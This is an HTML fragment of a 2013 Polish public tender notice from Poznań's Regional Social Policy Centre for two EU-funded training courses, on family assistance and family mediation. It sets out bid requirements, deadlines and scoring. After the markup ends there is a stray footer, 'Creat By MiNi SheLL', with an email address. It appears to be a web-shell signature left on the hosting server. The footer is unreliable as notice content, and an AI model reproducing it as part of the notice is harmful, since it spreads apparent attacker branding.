<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto do oferty należy załączyć następujące dokumenty: 
- wypełniony i podpisany przez Wykonawcę formularz ofertowy (załącznik Nr 2.1 do SIWZ dla części Nr 1, załącznik Nr 2.2. do SIWZ dla części Nr 2), 
- pełnomocnictwo do reprezentowania Wykonawcy,w przypadku podpisania oferty przez przedstawiciela Wykonawcy ( w formie oryginału lub poświadczonej notarialnie kopii), Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ustanawiają pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego są zobowiązani do złożenia w ofercie pełnomocnictwa ustanawiającego pełnomocnika, o którym mowa powyżej. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
- dowód wniesienia wadium dla każdej części należy złożyć oddzielnie określając, której części dotyczy 
-dokumenty potwierdzające, iż usługi wskazane w wykazie zostały wykonane lub są wykonywane należycie (np. referencje lub protokół odbioru usługi - obejmujące co najmniej wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował/realizuje zamówienie, którego dokumenty dotyczą, wskazanie podmiotu, na rzecz którego realizowane było jest zamówienie, opinię tego podmiotu, podpisaną przez umocowanego przedstawiciela, stwierdzającą, że zamówienie zostało wykonane jest wykonywane należycie, 
- wykaz Doświadczenie w przeprowadzaniu szkoleń i kwalifikacje kadry szkoleniowej dla potrzeb oceny w ramach kryterium - Załącznik Nr 9.1. dla Części 1, Załącznik Nr 9.2. dla Części 2.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy są określone we wzorze umowy: Załącznik Nr 5.1. do SIWZ dla Część nr 1, Załącznik Nr 5.2. do SIWZ dla Część nr 2</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Ośrodek Polityki Społecznej w Poznaniu, ul. Nowowiejskiego 11, 61-731 Poznań pok. 320.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2013 godzina 09:00, miejsce: Regionalny Ośrodek Polityki Społecznej w Poznaniu, ul. Nowowiejskiego 11, 61-731 Poznań pok. 208 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> świadczenie usług szkoleniowych w ramach projektu systemowego pn. Podnoszenie kwalifikacji kadr pomocy i integracji społecznej w Wielkopolsce, Działanie 7.1.3. Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenia szkolenia pod nazwą:
Asystent rodziny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia: Celem szkolenia jest przygotowanie osób do pełnienia roli zawodowej asystenta rodziny, poznanie praw i obowiązków, zadań i uprawnień jakie stoją przed asystentem rodziny, poznanie metod pracy z rodziną dysfunkcyjną oraz zdobycie praktycznych umiejętności udzielania pomocy i odpowiedniego wsparcia poszczególnym członkom rodziny.
Zakres tematyczny: 
a)	wybrane zagadnienia z prawa rodzinnego, administracyjnego, karnego, cywilnego, zabezpieczenia społecznego oraz prawa pracy;
b)	wybrane elementy pedagogiki, psychologii rozwojowej i wychowawczej, z uwzględnieniem problemów dotyczących rozwoju dziecka i wpływu sytuacji kryzysowych w rodzinie na zachowanie i rozwój dziecka;
c)	regulacje prawne w zakresie wspierania rodziny i systemu pieczy zastępczej;
d)	zadania i uprawnienia asystenta rodziny;
e)	etyka pracy asystenta rodziny;
f)	analiza własnych możliwości i ograniczeń w wykonywaniu zadań asystenta rodziny;
g)	komunikacja interpersonalna;
h)	metodyka pracy asystenta;
i)	definicja rodziny, jej struktura, funkcje oraz potrzeby i problemy;
j)	charakterystyka problemów rodziny, w tym:
- problemy destrukcyjne zachowań dziecka i rodziców,
- nieprawidłowe postawy rodzicielskie,
- problemy wychowawcze,
- problemy w pełnieniu ról społecznych, bezrobocie, uzależnienia, choroby psychicznej;
k)	analiza potrzeb i problemów rodziny;
l)	sporządzanie planu pracy z rodziną;
m)	doskonalenie umiejętności opiekuńczo-wychowawczych rodziny, umiejętności radzenia sobie w sytuacjach stwarzających trudności wychowawcze oraz w wypełnianiu ról społecznych;
n)	problemy wynikające z opieki nad niepełnosprawnym dzieckiem;
o)	organizowanie wspomagania rozwoju dziecka z problemami emocjonalnymi i zaburzeniami zachowania;
p)	problematyka mediacji w rodzinie;
q)	elementy ekonomii i organizacji gospodarstwa domowego;
r)	zagadnienia dotyczące uprawnień w zakresie wsparcia osób niepełnosprawnych;
s)	edukacja zdrowotna;
t)	problematyka interwencji kryzysowej w rodzinie;
u)	organizacja czasu wolnego dzieci i młodzieży;
v)	pielęgnacja niemowląt i dzieci;
w)	pomoc w funkcjonowaniu rodziny w środowisku lokalnym;
x)	współpraca asystenta z rodzinami oraz służbami wspierającymi rodzinę;
y)	zapoznanie się z systemem funkcjonowania instytucji prowadzącej pracę z rodziną, w formie praktyk w tej instytucji.
Termin realizacji szkolenia: Całość szkolenia musi zostać zrealizowana do 30 września 2013r. 
Sposób organizacji zajęć i praktyk: Wykonawcy ubiegający się o realizację niniejszego zamówienia  zobowiązują się zorganizować i przeprowadzić szkolenie dla 20 osób w jednej grupie, w wymiarze 230 godzin dydaktycznych (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut), w tym 30 godzin z zakresu analizy własnych możliwości i ograniczeń w wykonywaniu zadań asystenta rodziny i 30 godzin praktyk w instytucji prowadzącej pracę z rodziną.
Szkolenie realizowane będzie w cyklu 11 trzydniowych (21 godzinnych) zjazdów wraz z zapewnieniem uczestnikom poszczególnych zjazdów dowozu, zakwaterowania oraz wyżywienia.
Wykonawca zapewni Uczestnikom szkolenia realizację praktyk w instytucji prowadzącej pracę z dzieckiem i rodziną. Warunkiem otrzymania zaświadczenia o ukończeniu szkolenia jest zakończenie udziału w zajęciach i zrealizowanie praktyk w wymiarze minimum 30 godzin. Wykonawca wskaże co najmniej dwie instytucje, jednak nie więcej niż trzy w których planowane są praktyki, oraz przedstawi program praktyk.
Materiały szkoleniowe: Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 5 dni przed podpisaniem umowy. 
Rekrutacja i obsługa administracyjna: Współpraca z Zamawiającym w zakresie naboru kandydatów na szkolenie i tworzenie listy uczestników oznacza:
-	nawiązanie kontaktu Wykonawcy z jednostkami pomocy i integracji społecznej w Wielkopolsce i na podstawie otrzymanych tą drogą zgłoszeń przeprowadzenie wstępnej kwalifikacji uczestników szkolenia oraz sporządzenie listy kandydatów do grupy, 
-	przekazanie sporządzonej listy kandydatów Zamawiającemu w celu uzyskania jej akceptacji. Dostarczenie ww. listy musi nastąpić na 2 dni przed terminem rozpoczęcia pierwszego zjazdu, 
-	poinformowanie kandydatów; po otrzymaniu od Zamawiającego akceptacji zgłoszonych uczestników, o zakwalifikowaniu się na szkolenie. 
Wykonawca dokonuje ww. czynności posługując się formularzami przygotowanymi przez Zamawiającego i z wykorzystaniem danych kontaktowych udostępnionych przez Zamawiającego (baza e-mail jednostek pomocy i integracji społecznej w Wielkopolsce).
Zamawiający prowadzi działania wspierające działania Wykonawcy w formie ogłoszeń, listów oraz informacji na stronie internetowej. Mają one na celu promowanie szkolenia i informowanie o szkoleniu jednostek pomocy społecznej w Wielkopolsce.
Organizacja szkolenia
Dojazd: Wykonawca jest zobowiązany zorganizować dojazd uczestników:
- pierwszego dnia z miejsca zbiórki uczestników szkolenia do miejsca w którym realizowane będzie szkolenie oraz 
-  po zakończeniu szkolenia powrót do miejsca zbiórki. 
Zakwaterowanie: Wykonawca jest zobowiązany zapewnić zakwaterowanie uczestników w pokojach 2 lub 1 osobowych, w hotelu trzygwiazdkowym lub ośrodku rekreacyjno-szkoleniowym spełniającym standard hotelu trzygwiazdkowego, położonym w woj. wielkopolskim, w tym w mieście Poznaniu. 
Sale szkoleniowe: Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. 
Wyżywienie: Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia, a dostarczane posiłki powinny zapewniać 100% całodziennego zapotrzebowania na energię i składniki odżywcze.
Wykonawca zobowiązany jest zapewnić uczestnikom: 
- pierwszego dnia - obiad dwudaniowy z napojem, kolację,
- drugiego dnia - śniadanie, obiad dwudaniowy z napojem, kolację,
- trzeciego dnia - śniadanie, obiad dwudaniowy z napojem,
- 2 serwisy konferencyjne w każdym dniu szkolenia, składające się z kawy, herbaty, wody mineralnej, soków, owoców; np. jabłko lub banan, wyrobów cukierniczych,
- zorganizowanie kolacji integracyjnej podczas pierwszego dnia szkolenia.

Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku Nr 1.1. do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.11.00.00-4, 55.12.00.00-7, 55.30.00.00-3, 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Dz - Doświadczenie zawodowe w pracy z dziećmi i rodziną - 30</li>
<li>3. Ds - Doświadczenie szkoleniowe z zakresu pracy z rodziną - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenia szkolenia pod nazwą: Mediacje rodzinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia: Celem szkolenia jest przygotowanie uczestników do pełnienia roli mediatora rodzinnego poprzez nabycie wiedzy teoretycznej i umiejętności praktycznych z zakresu: wspomagania rozwiązywania konfliktów, skutecznej komunikacji, negocjacji i mediacji. Szkolenie ukierunkowane jest na wykorzystanie mediacji w systemie pomocy dziecku i rodzinie.


Zakres tematyczny:
a)	 podstawy psychologii konfliktu w rodzinie i jej otoczeniu;
b)	wskazania i przeciwwskazania do podjęcia mediacji (diagnoza sporu, analiza gotowości stron do mediacji i postępowanie w przypadkach przeciwwskazanych, ocena rodziny pod kątem zagrożenia przemocą);
c)	podstawowe założenia mediacji rodzinnych;
d)	prawo w mediacjach rodzinnych;
e)	prawidłowa komunikacja;
f)	metody, techniki i narzędzia w pracy mediatora rodzinnego;
g)	etapy mediacji i zadania mediatora w poszczególnych fazach; 
h)	ugoda mediacyjna - cele i jej zadania (aspekt prawny oraz psychologiczny);
i)	etyka pracy mediatora;
j)	zarys procedur mediacyjnych w sprawach karnych, cywilnych i osób nieletnich.

Termin realizacji szkolenia: Pierwszy zjazd szkolenia musi zostać zrealizowany, tj. zakończony w terminie do 15 kwietnia 2013 r. Całość szkolenia musi zostać zrealizowana do 30 września 2013 r. Informacja o terminach poszczególnych zjazdów zostanie przekazana Zamawiającemu nie później niż 5 dni przed podpisaniem umowy.

Sposób organizacji szkolenia: Wykonawcy ubiegający się o realizację niniejszego zamówienia zobowiązują się zorganizować i przeprowadzić szkolenie dla 40 osób, w podziale na trzy grupy, w wymiarze 105 godzin dydaktycznych dla każdej grupy (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut). Szkolenie realizowane będzie w cyklu 5 trzydniowych (21 godzinnych) zjazdów wraz z zapewnieniem uczestnikom poszczególnych zjazdów dowozu, zakwaterowania oraz wyżywienia. Zajęcia będą prowadzone przez dwóch szkoleniowców jednocześnie. 
Szkolenie powinno zakończyć się egzaminem, którego zakres wynikać będzie ze zrealizowanego materiału.
Przystąpienie do egzaminu nie jest obowiązkowe. Uczestnik, który przystąpi do egzaminu otrzyma zaświadczenie o ukończeniu szkolenia wraz z informacją o wyniku egzaminu. Uczestnik, który nie przystąpi do egzaminu otrzyma zaświadczenie o ukończeniu szkolenia.

Materiały szkoleniowe: Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 5 dni przed podpisaniem umowy. 

Rekrutacja i obsługa administracyjna: Współpraca z Zamawiającym w zakresie naboru kandydatów na szkolenie i tworzenie listy uczestników oznacza:
-	nawiązanie kontaktu Wykonawcy z jednostkami pomocy i integracji społecznej w Wielkopolsce i na podstawie otrzymanych tą drogą zgłoszeń przeprowadzenie wstępnej kwalifikacji uczestników szkolenia oraz sporządzenie listy kandydatów do grupy, 
-	przekazanie sporządzonej listy kandydatów Zamawiającemu w celu uzyskania jej akceptacji. Dostarczenie ww. listy musi nastąpić na 2 dni przed terminem rozpoczęcia pierwszego zjazdu, 
-	poinformowanie kandydatów; po otrzymaniu od Zamawiającego akceptacji zgłoszonych uczestników, o zakwalifikowaniu się na szkolenie. 
Wykonawca dokonuje ww. czynności posługując się formularzami przygotowanymi przez Zamawiającego i z wykorzystaniem danych kontaktowych udostępnionych przez Zamawiającego (baza e-mail jednostek pomocy i integracji społecznej w Wielkopolsce).
Zamawiający prowadzi działania wspierające działania Wykonawcy w formie ogłoszeń, listów oraz informacji na stronie internetowej. Mają one na celu promowanie szkolenia i informowanie o szkoleniu jednostek pomocy społecznej w Wielkopolsce.

Organizacja szkolenia
Dojazd: Wykonawca jest zobowiązany zorganizować dojazd uczestników na każdy zjazd:
- pierwszego dnia zjazdu z miejsca zbiórki uczestników szkolenia do miejsca, w którym realizowane będzie szkolenie oraz 
-  po zakończeniu zjazdu powrót do miejsca zbiórki. 
Zakwaterowanie: Wykonawca jest zobowiązany zapewnić zakwaterowanie uczestników zjazdów w pokojach 2 lub 1 osobowych, w hotelu trzygwiazdkowym lub ośrodku rekreacyjno - szkoleniowym spełniającym standard hotelu trzygwiazdkowego, położonym w woj. wielkopolskim, w tym w mieście Poznaniu. 
Sale szkoleniowe: Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. 
Wyżywienie: Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia, a dostarczane posiłki powinny zapewniać 100% całodziennego zapotrzebowania na energię i składniki odżywcze.
Wykonawca zobowiązany jest zapewnić uczestnikom podczas zjazdu: 
- pierwszego dnia - obiad dwudaniowy z napojem oraz kolację,
- drugiego dnia - śniadanie, obiad dwudaniowy z napojem, kolację,
- trzeciego dnia - śniadanie, obiad dwudaniowy z napojem,
- 2 serwisy konferencyjne w każdym dniu szkolenia, składające się z kawy, herbaty, wody mineralnej, soków, owoców; np. jabłko lub banan, wyrobów cukierniczych,
- zorganizowanie kolacji integracyjnej podczas pierwszego zjazdu.

Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku Nr 1.2. do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.11.00.00-4, 55.12.00.00-7, 55.30.00.00-3, 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Dp - Praktyka mediacyjna - 30</li>
<li>3. Ds - Doświadczenie szkoleniowe z zakresu mediacji rodzinnych - 30</li>
<li>4. Dm - Przeprowadzenie superwizji mediacji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com